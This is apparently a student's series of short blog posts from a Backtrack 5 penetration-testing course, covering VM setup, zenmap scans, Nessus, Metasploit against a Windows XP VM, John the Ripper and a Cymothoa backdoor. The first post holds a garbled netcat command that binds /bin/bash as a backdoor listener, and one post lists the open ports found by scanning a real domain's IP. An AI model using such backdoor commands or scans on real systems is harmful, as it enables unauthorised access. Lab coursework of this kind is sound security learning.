Put Cymothoa to Ubuntu by Using NC

Now i try to make a backdoor with NC to inject Cymothoa to Ubuntu.

For the first step, i open the tools cymothoa which located in Apps -> Maintaining Access -> OS Backdoors -> Cymothoa

Then is typed a command:  root@bt:/pentest/backdoors/cymothoa# nc -l -v -p 12345 -e > cy /bin/bash 

Privileges Escalation Part 2 : Cracking Password With John The Ripper

Now i try to cracking the password that i got in my previous article.I use John The Ripper tools in my backtrack 5 R1.

John the Ripper is a free password cracking software tool. Initially developed for the UNIX operating system, it currently runs on fifteen different platforms (11 architecture-specific flavors of Unix, DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing/breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix flavors (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL, and others.

John The Ripper located in Apps -> Privileges Escalation -> Password Attacks -> Offline Attacks -> Jonh The Ripper.

Privileges Escalation Part 1

Today i've learned about privileges escalation in my class. Privileges escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.

I've try to do Privileges Escalation to host 192.168.0.21

How To Exploit Windows XP with Metasploit

Ok, in this session we will try to exploit Windows XP with Metasploit.

My victim is Windows XP that i've installed in my virtual box.

First step, we try to get an information about our victim with Zenmap or Nmap tools.

From the picture above i know if host with IP address 192.168.56.101 was use a system operation Windows.

Ok, now we try to connect to that IP address.

Vulnerability Assesment and Exploitation With ExploitDB

Today, i've learning about Vulnerability Assesment and Exploitation in my class.

Vulnerability is a weakness that allows attacker to enter and get access into the targeted computer.

an Example for Software Vulnerability is Buffer Overflow. And then the example of Human Vulnerability is Secure Awareness of that person and then an example of Hardware Vulnerability is Unsecured or Unprotected from that hardware. 

In this session i've use tools Nessus and exploitdb in Backtrack 5 R1.

Ok, first, i'll try to do Information gathering step to search an interesting host which have the most service.

In this step, i use zenmap tools.

After scanning that, i got 1 interesting host. That was host with IP address 192.168.0.67

How To install Nessus On Backtrack 5 R1

In this session, i'll try to install Nessus on my Backtrack 5 r1.

First, download Nessus on http://www.nessus.org/ ..

I located the nessus on directory /root/Tugas 2/

After that i try to install nessus with command :

root@bt:~# cd /root/Tugas\ 2/

root@bt:~/Tugas 2# dpkg -i Nessus-4.4.1-ubuntu910_i386.deb 

Selecting previously deselected package nessus.

(Reading database ... 314453 files and directories currently installed.)

Unpacking nessus (from Nessus-4.4.1-ubuntu910_i386.deb) ...

Setting up nessus (4.4.1) ...

 - Please run /opt/nessus/sbin/nessus-adduser to add a user

 - Register your Nessus scanner at http://www.nessus.org/register/ to obtain

   all the newest plugins

 - You can start nessusd by typing /etc/init.d/nessusd start

Processing triggers for ureadahead ...

Information Gathering Part 2

Ok, now i'll try to do Information Gathering again.

I'll try to get information from 3 domain.

That is..

1. is2c-dojo.com

2. is2c-dojo.net

3. spentera.com

First, i try to find information about is2c-dojo.com with who.is.

With who.is, we can get many information like :

1. IP address
2. Creation Date
3. Expiration Date
4. Registrar
5. Name Servers 
6. Server Type
7. Website Status
8. Domain servers
9. Registrant Data
10. Contact Persons
11. etc.

After i search it, i found the information like this.

After i get an IP address from that domain, i try to find the port which opened in that domain.

I try with zenmap with IP address 67.222.154.106.

and the result is like this.

From the information above, i found there are 9 ports and services opened in that IP address.

There are :

1. port 21 service ftp
2. port 53 service domain
3. port 80 service http
4. port 110 service pop3
5. port 143 service imap
6. port 443 service http
7. port 993 service imap
8. port 995 service pop3
9. port 25 service smtp

Information Gathering Part 1

Today, i've been learning about information gathering in my class.

I've try to use some tools in Backtrack 5 R1.

First tools, i try to use zenmap tools.

Zenmap was located in Apps -> Information Gathering -> Networks Analysis -> Network Scanners -> zenmap

In column Target, i typed IP address network which i want to scan.

I typed 192.168.0.10/24.. and then the scanning result is .....

How To Install Ubuntu on VBOX and How To Connect it From Host to Guest

In this note, i will try to install Ubuntu on VM VirtualBox in Backtrack.

First, Open the Virtual Box Machine. In this note, i use Oracle VM VirtualBox Machine.

Then, we choose on Toolsbar : New. Then We Click Next Button.

Then type the Name of the virtual device which we made. In my device, i typed Ubuntu. After that we click Next again.
Then we made size of the RAM Memory which we will use. I use 512MB.

Then we click Next again.

In this session we click next again and then next again until you see a menu to specify how much memory you want to use in your Windows virtual box like a picture in below.

In my virtual box, i use 6 GB Memory. Then click next again and then click Create and Create again.
Then we click start on Ubuntu and then click next.
Choose a location of Ubuntu which you want to install.

How To Install Windows XP on VM VirtualBox Machine and Connect From Host to Guest

In this Note, I will try to Install Windows XP on Vbox in Backtrack 5 R1.

First we open the VBox in Backtrack 5 R1.

Then, we choose on Toolsbar : New. Then We Click Next Button.

Then type the Name of the virtual device which we made. In my device, i typed Windows. After that we click Next again.

Then we made size of the RAM Memory which we will use. I use 256MB.